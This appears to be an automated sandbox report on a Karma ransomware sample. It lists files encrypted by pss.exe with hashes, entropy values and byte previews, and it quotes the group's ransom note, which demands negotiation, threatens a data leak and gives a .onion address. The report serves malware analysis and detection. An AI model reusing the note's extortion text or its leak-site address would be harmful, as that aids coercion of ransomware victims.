.eX....}.S.S..DS%..d`Zj.z.._.0(...6.k.u...w6.D...o..
C:\Users\user\Downloads\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81284245460368
Encrypted:false
SSDEEP:24:sTNyGquO8mM0PjnFG9nonYyWqwtGGbQzG/QSz9Uom7YMYw:W4uOg0eFqwrn/Qg9q73
MD5:7ABB55513973EEF9C6FE7051FDE2CD72
SHA1:01C7F9ACF20AAA847B8BFD795543E46F113F89C3
SHA-256:AD90946F5CCD84818257FA598A10E2263DD2329E9B792A1018B113A36D29B5DD
SHA-512:FB2A22E857A1F3C6A04F8909B8D311CE73A25FCE798C9CAE6E20B7CA9CAA82D19A6F31F4F108BE4C5CB0AC4DF32F2BE0E9CDFD2FCC33CD94C83DAB6F28261BEE
Malicious:false
Preview: ..H.....}.u,0..g.a.^.HQ.G.b.s.....D..-..s4.].n..Y.K1G........KARMA.........!..^...'.~YN.;.N.........{.P..P4S...G..S.k-..Y.z.b6f.i..>c@.T.@M....)O.)%...f?.3...:*f<...qH..w.`....ULs.L..........l.ZT...<aO=......0.i~.q1ob..._..Z...Xq...(.......k.P4f...&..n....@x.Ld....;..q.YQ%.I.G.^..5`......z.k...,..c.$.O...ti6..Z1.y.Q.....).l.^'@.".....e..H<r.^..D..`._...0...Q.....".....X..#.e.........l.....j.T..{..TG..z.G.$..Pt.li....P...,.......X..?DR........@1o.].|....o..]:.G.|@..V2.H..$.....nQ...2....0.%h"..L..[..aD...t(l...B6V.d.Z.<wc......}.......0V..%d..=E0.....xk.;..`...g.;...X...........J....N.&[Kp6.....n^....6f.P`..Cb.....R..d:.s......Q..ps%....t..0.....D;....u...A>...v;.'...(.XK.l..ye..l....5.E\.U9;H...{TAl..\..H.+.Z,.._.........O.<?_../.......A...+...........I%..=..P.7......*#R..x...3.,Q.P...V.p..I.{.....p/m.x.v@....T......F...rZ..:U_.!T.K.P......nw. .5.......el...'.1.D.Y../.6..e.y.z..{..I...{E.Q.S~...Zpw.<FD"........G.'.aq...K.
C:\Users\user\Downloads\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.851850114234256
Encrypted:false
SSDEEP:24:/LrIVgADmvqWN4KBwVYjjtqaM1x7xFPsx0wvdozI8+wa:Trc44KBwVYj5U1RPavGz3g
MD5:0C009BF92371C3E64F9DCEB4EE37C524
SHA1:2A112878005FE01A389D737745FF8D30BF599A3F
SHA-256:E5266C20F1B7410B18FC54924BC80DB588861A5D4FAEDC0D90B4E212E085F8A3
SHA-512:D925AB67B09EDF9966A792C0CE247E9E63CC9305961AB32121611E4AB2782630CC05DCBAF06A18DDFA20F5AEB7789DEC559AD8275A345C3E1FCEE2998F76BDDF
Malicious:false
Preview: ....5.P..[^.MInw.*.sS....pFK...........e..2.]CV...+.-...z...KARMA.*9.EI...9..>..........k.K ..*a.s...hu'.d..G%....|..7.d...g..f,~...w..^69...6.Pl.-S.Z.Hb...(g.Q.^..k4k/R....<..`...={Y.;i....K.7...Z....G..8&.}.&!.m..(...U.K...t.h...Zd..H.....|..vl.2BO....D....NEz..S........eR..z>I..\*.#.....H4:.'~}iT]...%...).....wAM:6B.E.)......sM..3,.f..~U.......$..RM.....X..Y...z^.?..:.......Ab....S.l..f..V8I)...[...:...B..n...HO']....\...I.|..{HsvC@.%Dy....!....2.Z.v.....1J....D.2B...N.........^.T.C'.".X..4.....fG.@.(..T....._...@h..y.5.|......_h3..&.nkv|.......B=....\......J....HT.G.%.....W..Kq...=g.6...@....f.V.f."'..&|.s.I"/P.....&..%....L..e.1..v.u.)*.-..<.w.//:7z.5....c. .X.8......W.g....KE...D.*....f3.,HZ;.J$%...}.3...=v.U7.Eu:..b0..9.M.d..../....T$B6..r..@`..'.....=f`._H.tVS..gR.=../../ih.9..&......c............),.$Ek1.o..T..q..5....%.........:[W"_H.\...9.....dy:........P...a.OJ0..K....6....n...A.3._.93.{p..G|,.../.E..GeG..'r.+..~..3.C
C:\Users\user\Downloads\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840201262589571
Encrypted:false
SSDEEP:24:PTvXies9I0SSgaQqhLUlXvUObKyGDyFw7ljiKs7bgN/Q:7yewrSZaUVvGVDyu7FiKsvC/Q
MD5:7762601B8C810D88740782756F94116E
SHA1:2A6B27A9D790520F7AF9FB7A8B660738671AEBF9
SHA-256:0638FFAB2E85DD8EA7BF3EA4282FF77B0C87A0D8D465A206AA4ACF0C32FBC47C
SHA-512:A3AEC0320FAB2F515F210025EA118CD862473740412A4499CF23DECA0213769BC75D13F3E9F54A475721F591B256069185BBEFC1E2A4E6B0BF4DC42C00E67139
Malicious:false
Preview: W..6.&".=nL.G.3.i..m3.(NN..l....x..!..KP...@.........G.Z.M..B...KARMA_....E.&.].:..q(c.i..S....R..#....<..'.A?'\...;Li..k.l...~........2.w.....&.....].#.q..?.M..|e.....9.....:........1@......V..HN.W.t.?.!E.8W.!].{".?B..wg[.,.k|..a.2.M.-#....*..9.{....+Y.^",A.......vld..:....l? 9...ZAi.~......^..].X..pV....J..R..j...Cl..H..bG.....>".['[.....}I..bo=...3N..)...)........f..)..9..pnX;d\......bjjS....4.%..E.u..S...f.HU..D.A.[Cs.T.#.Xq<h...E...\....i.pRlo0.....A...UHG..$.rY+6...*2=....:`..Y...Ju......\..<.Z..........,.+t.#...{a...].,.7]..J...o..h..^o{...Y...B1...k.(v-.$../P.{....}J?.O_v~iBhGI...T.<...........TNN1.)Q[B......D.h....b}.E*.^...)..~`)c-w...W.'2..5../,H..L.uT...r..@=Ei.v...l;ks.+ ....#;;s...\.....r........../......4.=7.G.P.=?...N..Mq....C.?..B.O.d}..*.01....../b$...ESO.\+...h.E.?..ww..j..}.B......d.S.U.(.>;^..s.o...>.MMxz9.W00...+.6U....ro.!..#..I........2.y..~..v...Q6.C.9.......=.A.+...jT.^.!<....".7.2..?q.*.E.y.1H..e...i...a`..
C:\Users\user\Downloads\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826497789071994
Encrypted:false
SSDEEP:24:BQXsPHdhz4w4TTe1CtIisksICMmWfyBnSit30I7Qh:e+4TTTe4tIDk9CjWfyBSit34
MD5:93929BA2C827B99CC4EF642DCCE4055E
SHA1:C01C2794B841E3C1DDCF0F6E499280598C9887A5
SHA-256:3D0D7CCD2F69B136D36C3E2A8C2CDADBD3D519D885C3DBA6EF459668A23CA347
SHA-512:809C46F361129210861F394C0C5E0EB806A34EFE4B3F61B3F60E6E8AE0FC52BB94DE25E5EEFFF9BFB30124E81E7021E90AE76A32A855B6A0934EB1F2CD1DC092
Malicious:false
Preview: .....TN..@.2.3....j]........\...AM..3:.S..V.4S.=...1...g...8....KARMA.0..........i.V......v2.Y].z.'.wF$.....\^s..J..V...-.%....]. ..,....T."...^...Wy..3...-.h.....`2H2.0...{.R...s..o..r!../ .?F.y..Q$...7...>.....>y...Z..>....8..}....V...a.3...^RN....c............V$.p...w8...M<.U....GG._C.......K.."..g....1..n?M....../..`.%..YJ...f...!...F.6.t...&.A.D.d.....>&..X..\eZ....."v&....{....7.K.....................TQ@..P..d.LEi.._M".....-.....5..=.J.;.....+...'.....*.r...B.P..O8M..;.JKp....ze.#...s.......Ii.,B.n. ..+.)...n6..4.g.:Z4*....I.....d..W.'..V..........w/.#..5.z.{\.....U}.'^..j..5Q?..g`l5.....QDr...;.W.l..(+.&...i<..`.128..M.P.:."#.7.':+\.nb..,.bt..I../................n.8e.....t.._..!D.[.V?.)6.[.....1..ax"."3..zeyCB.... .[s..+z...%....H.N.<..l.y.G.J..d...S&..[bsb....S..>.D.....;Y..aN...5X)..m.*....$..z....t#...~`"+$.\m..r.4.8i}..u.._...QIO,...L........OH2.j.z.^|......q).@'.,..].......:}n..L...H...d0&%.U.wP.Z..a.3.pP....<{....`.0...v7.v
C:\Users\user\Downloads\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836894358080607
Encrypted:false
SSDEEP:24:J66iCkPfgTbT+nf6XbAd94/t8nB3Nn2pQpPMucbn:J1Tk3iXbAb0KJRMucb
MD5:7584833BADBE3A0056938470E2B6094E
SHA1:0D168714AB9B8C10B28CA878FC9E9684B6770D71
SHA-256:CEA087A1DEEA14C97D9D9236E430B99DB398A69F57B792386952177A0F84E646
SHA-512:002A2EE47189D7FB14EECCD86E2F69B22C6F20074478A399DCF4A198FC1BD7565D12DCEFC3F5676252A41360B2D03455157CDEE60B2B5181F30CDE7E0F9CD94F
Malicious:false
Preview: U.Q...w.z..j..C.H..x6..sSS....Q....%.............s1.7...O...KARMA..5.6...;....uD.c..p....'K...%.:_.Z7..b..t<EE.<.xf..E.P.qQK.I.EVZ#..!|....iK.3.9."lHZ..@..<..o...n).X.6........]..re...vB/.j..Y.R:..H/.PT..rc....3W.i..Q....{%.vW.+.....j...^..U......f#..7F........SdW..R......j.~....F.......P....J.i1.....'.../Y.Z.~..#..fV.....y.r.n...|..&......4..#B..0z...)l..I......d.......&....&.w...%>.pc_h"...g...H.....?....u`......i...$w.....d2n.4....B.......,K=##. br.........L.p.....Pp.k....Z}...H...pP...8......O...$..[..8[......p.}...y(.L......`.8.w'...%d.....z...a5..=.i+QBV..O.....kd.D..T.`'...6~.N....(....Z.{..5.h.e...U#.<2.6.W.X......_..a$...`VEd^F..b-.t....)<:z.a.G.7.st..W.7..})....~..i:)_Xp...0./%_..>...1..T..sZ.%...m*....t...G..-..o..L..(.eL.......Y|....3.(...5Ul^.-....[.l..Fi.3.6J&(*....e4..'.......L..Gb.t"~~.j1&.`..l......@..?......t.B.v>(c...<..W...`.....2O+..M&wT.:.wp.gh..........E...*8.....'<..../m.P.K..S}.%..iIMDh.b....).Ga....a8.....l....P
C:\Users\user\Downloads\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813700938199611
Encrypted:false
SSDEEP:24:wjjbnBQHKU1oxpkpGUSSo28Nn4S6trwxVVtKO5GQJ108nE8Z/n:mvBQeSr8FI07VtKOwQpd9n
MD5:F75780716C030640E3D69A906F81D02A
SHA1:28AD1E628E486F0847042190520B452C17BE1E28
SHA-256:CA19B44953E34C0D15BB2753CB42D1B19C957A1DCED52FEDCBFB7787C4A69017
SHA-512:87347EA34B43550F1DC5D188DA52C6F9A0976A7052FE7EE7803907A264BB2FF93C7E986E75C654480948F12E8259C59FBBABBA021D68721F1B6128C33A3188A0
Malicious:false
Preview: 1.d.p..g....b.&....Q.XR..P...~..D^.B.........s#.:..).=*.....KARMA.7.'.....J.x.o.%...l.a....m...NA....,.#tW.."... ..+.+...+5..Jc.......p?.-....K5.q...E..K..%.#...'...T?...aMm...qA,7..I*b.E.g.)...Vo.A....[..T..Ym/.[H.vT.t.d._..B..........5..n....<...n.|.Df\..t...>.4....8..?..{Q.M%\.T.....A..X....+j..{..!.%1O.>*.................4......+..(.s&.;+...y.:.lBB.=dN.!V.+.z.._.~.[].....,M.....TP6....v8&V. .x..z[;.:6+.....V.........s.IsR.}.Z}S[V.MW@.........c.-..L.P.....D.TA.3BeI.+."......\.!.U\tq..y8B. .m...1#......n..T%......m.i......1..!f.h.....a.D.5!0.=............\S.a.U6P.Ps...pW.KU.8...k[%lH...Q...H.y0...b.[ucZ... .....&.....m........b.....#....3.._qS.Z!.$Z-.qZ....%....`..3+......4..L9..H.. ...v}.....2.2.=.q.)..9..D.M...g..@..>.6...zw..XQ....p..f.w..........bj.1.fr..dY.......8>]%.nf..n@.Q..9..f.))...^.,.0|..-..3..].......?.......bl..S.s..dp.9..@j5(....V.5@=r{.=...[Y.F..v..w.....I.o..l...l+.c.{....r3&.0..@..T...u..<.....rdfg.ObQ.."..c\....K..ul..!.
C:\Users\user\Downloads\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819531832052393
Encrypted:false
SSDEEP:24:qO2f7Q4FCFSFo5nz1oBO0geWj2OSoe9Dep:r2f7QlSOSVgV27oeJep
MD5:4B3A77FD6F64EA2D52A174F2F9234B25
SHA1:1B32EF66ED0A90D319DF97FA3D9122E6DB1127A9
SHA-256:750300689B8EC77436461C628E9CBE0C6562FE93711C88CE71D11ABE1828B308
SHA-512:DDBF8E0E2374EA85324D3A31A1E05AFE635DE0090BFE5F54382178548D33C7FBDA391C6679B665B09E48FF836BC53F3E31B838FCE58C5A59DAAF90B19AE40344
Malicious:false
Preview: .c1.v..H|$..6..Sz].H...U...J.....(z.J;.:.....2h]...@....].-...KARMA.O.N.\.a`5#....*4..E.....".Q..4G.._...C..+.<.....[u..i.7...I_....o.;.....3...]...W..C...p/H....Q.f...K......5..6(PgT.........S..E.J...1...v.~.C...+I%DM.(...\ B.C.M...U..Z."8.^8].....GG7..D..@J.6.2..8v..a..{.......0Z..".'.....l<p0...B_.PfzF.%....~...+c...ch@..6_.....#...H....y....S.V...l.i+V....>@E.. .d.b/x-..]...>1.p..@...<(.G.E-.P.C=#...%.`..i...HY..T..g?..Z.a./..S.0.J...................._...|.~I.....s0%...n..A..6l....@q.....'..s,...h......j.........N..p?..iQ+..l.-..wp..i.....-..{..DaF.K`...?2.GQ.,.Y.>zL......u:+4......./.{.w..z._R........-i$.%....d..\.r?.6.....-.$!.}.9Bd...c0.T2%..1.p}.#..W.N.V....g6Qh.(.<iR'"s...f.....Uq<..O.(.bD...GE.$.\..yl.]V.Y......'[n(Q..<....Kh.._|o....c....q..O%.7F...)...B*.g..M...|..Q../..l.......bBX.s.....-...?.&...-#25.<.^....0......%.x6'..G......3....{W'E.4]....DTB.;...O...2+..]I..H.(>.@..+t|[..1..KH4&....+&.......s...x....gr8...M...k.
C:\Users\user\Downloads\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Downloads\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.823312150124047
Encrypted:false
SSDEEP:24:dBwOgv4J9eboIqV9j19c7lD03p+Ddl5TyVOFQDrAQqZjzijkGO4lb:HwOQenj1GlD0Z+X5TyVOFQDrXCa3O4J
MD5:A332AAFA835AB972B577AF88E80620E6
SHA1:0ADC96942ED6F66981B9976D69E9064A71946C97
SHA-256:17788D77E9DDF79DE5BE84BAE00154521394BC8DF9383D1072093BC494524750
SHA-512:C9DFA0736B0EF07D8FA8883E4237992CCDC19EF5DB55D21BB680C04F153205E176B5E99F87DFBBA663EAF99D808142454ACB29D46F6AD242141C3F4593907B15
Malicious:false
Preview: 3.gG..7O......(/...4{)..$..d.....,.....P...Q.6.....24.....G....KARMA.....A.2..r.g.I..`L.. .(t.U._....L.5.@..=....d9........;9r....Q....g.......)Q..D.iznU.<D..VgdFl.D.@....sm5T.|.o......Mi..U..F.;....qv;<$sl01.gF3:.vl.~bl$.3(......FM.J...].d..0'....M......a..5..YR>.w..i..5.Y..3.=.*.......gU.^.PQ.<..K.'......-.f.+h......L.9.Mn.X..3x.F...fcB.0..:6,0.....C.W....=..P..s....CG.:q7......c&m.A..?g./.....6TP.%uO....~D.L.j....G<.D4..r...K.......Qx[.u...9....E...q..4x.$/....H..WU.Z..4..x....t$">.X.'.]~...e*..DE..j..}(.x.?.%Ri.>..y...N...y./i..^y2xB..0..,...l...3p..N.t.5..dg.....6..8_..9...q.J.O....6.D.y.R+..W.d..?9......]..&k.Skx...'&=.5.......Z`.....tn.z...x..xp..8v..-..+LuaG\.v...(...h...S.VK.UA.^=.(. ...#..3L..n>.h.."}...t5*)~.p.:.-..kT..;?.....7o.m......I.R.Xj....l.......'..=.O.e..Zi|.|E...D..)...../i9.[.|...!;.R[d./#d..o.,H.......f/eiZBX.RL.......]G..*.Sz>..go.)J...."J......ncg..>...\.Z.W..m..|.. ..u.+.u^R......(..GO...R....N..;.G.1.9/2...R.....:.-z
C:\Users\user\Downloads\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.818448776663923
Encrypted:false
SSDEEP:24:55HZnV/5zDCvl/L6bHP5Npdd9vViZHVLMDi7xNh3PFwONnCk9RoEQo:555HaFL6bHP5NpVu1MoxNxF58o
MD5:BE5F06A51A2601F1D3477FAC6185815D
SHA1:00EAE340570F09B513439AC811F2E3AD52B7F2E0
SHA-256:944986A226F5B3081A7DD5D7B3583935ABB27B853E23085627B6CAC605D1B782
SHA-512:4B0755A4BC2FED0D6ABB17158F55205034B86C4914BE38BD2CDE111D5A38FF8FAE2617D962B0834EF876F35E5AFABB1F2D8F5566C2FDFCE715DF3BA9EDDE9368
Malicious:false
Preview: .;U.........OkE8..j.....K........g.9TvS...!e%.....=.... .K....KARMAW?d..^.Wp....;..L(......jN..?...72...5....f.".......[.@.+.....q........&&..!.,7..... ...."968.+....7..I.....R..dn..X"..h...>....H2...#. k~.....E..%...~..0.z:.w..../v...N..r.$"..J.C..%....7.(.Cw.a".....+.Wt<.a..Q..~.-g.)..k.AP..y..c&\P.&...s...q.`.".........j......A%..N...0TN..v..d./!.M..Z<-W.:....8.......Y...`R.i..%.....bTE....2r...<c..\w....lP...;.Y>.++!..!.`.N..*;......([..L..c.........bq....)T6<l.hq...'V.!QQ^.,.L..v...6..X.q:.2.h$...w..C...-k.4.......@..F..2..'XQ...y.^5.......".x..Q..(!S.....cj......d.A.A...x.....lJ.;.....,R..=.f..i.r`...Yq..|~n.xy.....<....h.+.x.?N...W1...>.$.F...BH..Oe.=..O.v....W.A.....m.Odq...........~..Ub.zD....m...pE[.f...p........`.c..M!..Y..:O..i.s..g....hl.q..q.m...D.rct.....W...,.J*......;S......`/. x....*.oh...RU^..;8v..<h....|3O..r<..+.,....>..|U.d.x}...X....X........7Wk.V.rui.......7.....$....I.....N..Z.p05.2...>...[..A.>1);....1|2'.WSd.He
C:\Users\user\Downloads\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.841143929859832
Encrypted:false
SSDEEP:24:aGSkg5iVPLAHfpIiOUhziETRn8u8c37ARqPR+HGeZMpFBZ2F9:a3OA/JOUhD5PAu+HGeqpnIF9
MD5:D46A6E9F9F7FA409B6C4DA4B03496D3A
SHA1:E4F3A65805A7FA5BD9659F7086230C11399BCF61
SHA-256:7E25A9536048F1F2ABCCD67113164379295A36522A299921BDF2690B38C32F17
SHA-512:5A7EEEB6F729C64848130B760B7A7AF8F49AD137E287F9DA94372CE2E510973136756D97C3A78F8A3044056515D4EC1262B6FAC391A34C6D4DBDD6EA5FA15E5B
Malicious:false
Preview: ...9...D...;.....La..~.\J/....D..#X..+....).5I.c.j!......F...KARMA^.....uV...[M.1.m.0.H1..P.."..B.1....RRo..q.2{.3$..vU[...= .Df..!....K9....#J.y...../.cC.Z..$i.........`.LO..l..b.c.rN.Y....8.k.!....Yjn..98R..>J...f..k.QU...".=NX/....".bl0@...DdZ0.[ie..v.G....N....6.l....W..S}.(..8../.-.S...R.........q...........g.X..?.q..&.3...!..!Q ..l+...~v..<....4%....2z.:0 sj-."....R.g..f.6P..m!.Oh)..@3.&H@thqE..A=C.d..Ab.(..*Ot......x..?i...c...Q...0.p....O.&.....P=.@.g.a..d....g...Gg....,..7....0.0H.P..0}...A..d%Y..7.9..G....*..vy.*.1n..B...........@. ......8Fo...1@.Ao`.).~...YQd..j.._.T.i.... ....e..........p.Cdn..}....<9.'.<...y..b.a....b@+1..kZQ...>.T..c..Z[...ubT.c0.;^x...Q...44.....WQ./.O.....2{nEe}..,.n..1..........k*.:..~.R.`..|X...]f..X.ME.b........Y.....2..z......QP&...s.....}.mr..|vx...huQ.=............y....2.m..[.....j.$...#.U..!.f....;..D......LY.../Z.....o.E..P.o@gB.9^...*...@....^n.ok..L.[.IfS.8.....3.(});..O.....$H.....2^2.P.2C..2A.?
C:\Users\user\Downloads\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.816065564803297
Encrypted:false
SSDEEP:24:f6J79gXrOc0bhIkKR8VJhUBtv7vuGP/XfpA5aT8nK9CxyKtNZpLKR:fGgbOs4Qtv77P/fpEaTj+Nt1E
MD5:781365153DF3C3016458644F53D3FC60
SHA1:45DDE3D366F2F6E074E857A34BF16B65FF989D8E
SHA-256:07433B072CEFC7E8BAF7DE4A02097879A8DA21EDC06AD5D1D1B253E7B7F04425
SHA-512:D08AED813271F1C9AC3E3B50A8FA57F5E5D784BDD6386CD149A6A89A466CF61EF447D159CF2815308E8FEA09F50D962D6477CC3D1969AC8B417884DBBB1B8C15
Malicious:false
Preview: QT.qA+.7Pk0...o...&^z..^.W{.X.....:.&....g...S.:_..i...........KARMA.........~....{..".Ez.....[k.@[*....F_...h..<U.A.&.[..Pa.. .`......l..gr2.......Zg...W..X.].......!....[N..l/..tC......0.B).Y.J.P.@`9m.#?.e'.Oi./.q.=d..7...l.lH....q ..h.@..E...@uY..H0Kk[..5ms..W..=e!....sb.....R~.].Uo......."Fk.y$... #.l.>...HC...p..A..XHx7J5.00..r..".+....>n.r....ma.S?..}6y:"~.zk|G.....}..^.P...Q....[.........V..)L..W....u|6......\N...P...D6...# ..}K &./S............~.....U.*4._B.-m.$!!(.2.0..p.T..az.p..H..j..0C...x..I~....zz..'.{.O.^...q....o5.t..#/ D..g..d.6_.v...X.%3%y.@..Z.h$E".:7I._..b.=...7w......sQ....4G,....>...G._...!.d.H....n#g..1...p.}e...r.....{.z..S....a.p~..V..P...zh.e..B..|6i.q.......+.kX..XF.p%.......;P...Y1..L*....>..1.M.d:..l......#.C$...\.)sVMgB.?..._.F.....D.5F...i..r.......Z:K.yv..=....[.i.\...1.2...fV..<..g6.ij/H..ql.v.a.............xf3B>~.i..Pk....|:..4.p..c.j..p......P.u34...v.R..'/(N.*..48bWf.`...T+.w..9./.....jB0.I.>:#
C:\Users\user\Downloads\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.810397506908055
Encrypted:false
SSDEEP:24:uwty4xyCtvc6GOnbdjvhbkj4jvLZp7WnS3pk+hEHaFdAtx:TXxyYvcSbdjvh4j4jvg8pdhEHaFdAtx
MD5:D3E065E36B769B39F7373F6C2BEA1F58
SHA1:86248099E8E14C0512C35B7301B8B56D8F09F9BA
SHA-256:1A23EB9B8422ED0337E6148447A9FD24E6B4F4FA14DA1206E6214F0AEA009844
SHA-512:3D32D6372F8D63705A15FED33BAE85B0D40A8F84AE1526B6A7B513A0AC56A3F6A3B5B87786ECCB556B2196F21CF6567433C502170B7A8EAEDE51146372414487
Malicious:false
Preview: .r.7.............S>/..X4...6......5k..qi..;h(.p.W...X..-......KARMA.g.T..MRU>pH~1^.....f..&4..O..+.`&..........,...z.U....r....h...QHMC..-i}2....w.RG.kK.Z.n1n..z..7..4.M....l......fq.1(3R.N.k.Pn..5..Mr..rIS"D...6..E.77.5].q\.wr."].?3..C..5kz_..6....#iz..X.l.(.zd#..D...v+Q.n.C..l.......Y..=s...W.....m...>.n [."N.[.`..^.....\.S(d..M...+q...:[......<......lR..........n.w..^.:>.....Z.hs...J....r/y.c .).a.5..nl.H@...8..p..7.R.vE.T.M...3.X.T...5...'e.O.h.1...2-..uL....5..Oz..{...$CtM......,\.Z..YZ......@JGZ1..nc....,.....2..hKG..X..\..n......1..S&.LpR.krZ..x?..n..Drngv...cV..M/.m..(.4........p.Y.|."bUe..o...c.S.+.}s.V.. .......h........+o..x@y.\..%B.r.F:...N.......V....?C}.. .......W..:[...X.....?..Ut.N,m.gC...L......y{..zr8u.9..%.J...........z....g....1...Q...49.?...k..&a..,.....8h%..\.Q..+h..h.....Y..N7...dU.&..?}..3.+fh..:q...c.%.=.ez..A...g.<...9R.j.K..7r....l$.........,..h..%...t.VO^.....(.Vp..y..r....J.8V....:Mf.^.i....9.e.%O.!..E,....c.<.$.L.
C:\Users\user\Downloads\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835493741139947
Encrypted:false
SSDEEP:24:ndV6oFMlzzTa6LozG9fmwRND/qifqhDzKMjnKh:vMlL7cXwnImyI
MD5:5540AE67DC608B71D03501EBC4D02F26
SHA1:4F8F9DB7221B0466D7679C90C9408F5413B89EB9
SHA-256:F5E0BD32FE2F8B5ED0DEDCC58E730C2DCB7F45D27AEADB379A6149793C2C9445
SHA-512:0F80A3E50E7C1B960D84CAB00D676A7B742D3C9A3758ED2288DC135697B73CDF6962B845B3E920FDE4EE5DC25069FA0E84A068AE507FBA8C70C3EAC27FBD090D
Malicious:false
Preview: K/*..EZw.Q....cO..@...7.........c4..+.Lm..S.....,.s.....Z..t...KARMA..-u...c...[....k...1..6[.u,.G2....[.Oq...m.....L..Fsg.&............W..f".w..Ih.z.G.W S..-.nO..7$Z...R Y......;...s=H.........K....]2"....>./\p:...#.A+......Dcl..uA.z..{.A...5i.tp....U..+.....}.?.D.x8.Q'.U...xH.(....6.[...QT.Ec..}|.U..\...r....2.'.G.s....."M1....b..ww.V...B...3...g..2.y....I.V..t.S.....0....^..&..o.jm3-...V?..|..fN._.m.i. ..wF&...U..-._FH.\.....a...(\]L|......J..g.........c..../..-.....6.....+.%..../T...`.<1u9[.Qb..x.....M.w..p.Z...9-...R..I__.$..]..Xe..r..91...m..0.#.g,..Dtz...%.u.X.v1.m.x.8..1..........f_*}....q.....U...i.!z!O.HM=.%..6.r_.PY.X0..#.p.H..G>.EH....s.7}pq.j&..........J.>.kg..&......MR.a...rl...5K..:^....}...&a.1.#...hy'.CS-.X..;.A....M..r-@...;..../Z...Gx.c.L`.w@ !.|l.5.!...t2.Z...h.c].l..PM.p..2.f.:.m.0.j.).C..]8.;y.[......h.....A?....l...1$._W...h....#..Z....]..Cq.[...?_........"..Y..^d.2...L..p.).6.^;.y...).._.2.V...E.........).H6....
C:\Users\user\Downloads\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.804702290356976
Encrypted:false
SSDEEP:24:nGQNthQQdYnZsfylxrcCv75zEzFV4Jzfm86y9WFw5ObR:vNPpehd75zEJyJzfRr90w5Od
MD5:7569FAD3A9E5F3E3E7D9796CAB4E559E
SHA1:498BCBC52E4C4D3ECB0546A94AF0366905DCAC9D
SHA-256:5C51714A2E62FD53C60E1AEC743D3DD18EA26ACEDA19BA98EDAB9780EA3C6F2D
SHA-512:E698AB725C540043A0A3613AF4D7C6E7224C67FF74C62B484B2A181ED56EA2250F6A8D20ED3027B4C84DD6DC47DDD4DC8EC1D4841830A0400FB0ECD3CD846B47
Malicious:false
Preview: u.n!s^.G..h.W..T.M9.7.N.0kQ....9..F..t..q...*...%*..h6.l......KARMA.+%..$..X.t.!1.'08Rk.O.[P.+.E.%.WP7AO.......9A...7.....@R.]..QS..>.2...$..b.M.I"t....D..s_$z.."b....VZ....dq.....P..+H&V..+.j/...]}..I.Y....o~........j..7.S.q(.....A.k980:.G;QXp./".:.5..m..*.S...@;K'%^..K+.o.#......Z.)/C.o.%.K.k/.9.^u&%C.^...X.9.4jO....*.l...=.b._X$..".....kLI.t...Z..e.u.}.......a./V.J.....!.t.W..^US;...SB2\..Iu$b9vT....x.z'8K..#.c......e.H0.K..}$V....9.d.\.J..9?h.K....L@K...W..&+O...x..).........?!..V..p...\......t.........i.`.t.t.\....8..<#.........B.$j..).(e.z.\%A.V.......{yZ......%.a..*2.F..B.}....Ap ..?...d/....@.E'h2{._......>..(.p..z......!v...1R.S.WJ/)C....1bX.u!....'\..+..?.g.....'.rR..P..[.b..6....k?W.l.jHh...r....6...".).e.C*..-..z.o c.sP..`gp.QX8_...)...j..K...~2....|U@7.9k{[...>. 